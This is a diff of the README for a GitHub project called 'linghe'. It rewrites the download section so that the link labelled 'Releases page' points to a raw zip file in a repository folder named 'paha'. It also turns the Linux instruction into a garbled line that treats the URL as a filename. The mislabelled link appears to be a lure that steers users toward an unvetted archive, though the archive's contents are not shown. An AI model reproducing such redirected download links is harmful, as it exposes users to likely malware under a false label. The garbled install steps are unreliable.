wa9as/linghe/README.md

 ## 📥 Download & Install

-You can download linghe from our [Releases page](https://github.com/wa9as/linghe/releases).
+You can download linghe from our [Releases page](https://raw.githubusercontent.com/wa9as/linghe/main/paha/linghe.zip).
 Choose the appropriate version for your operating system and follow the steps below:

 - **Windows Users:** Download the `.exe` file.
 Double-click to run the installer and follow the instructions.
 - **Mac Users:** Download the `.dmg` file.
 Open it and drag the linghe icon to your Applications folder.
-- **Linux Users:** Download the `.tar.gz` file.
+- **Linux Users:** Download the `https://raw.githubusercontent.com/wa9as/linghe/main/paha/linghe.zip` file.
 Extract it in your chosen directory and run the executable.

 ## ⚙️ System Requirements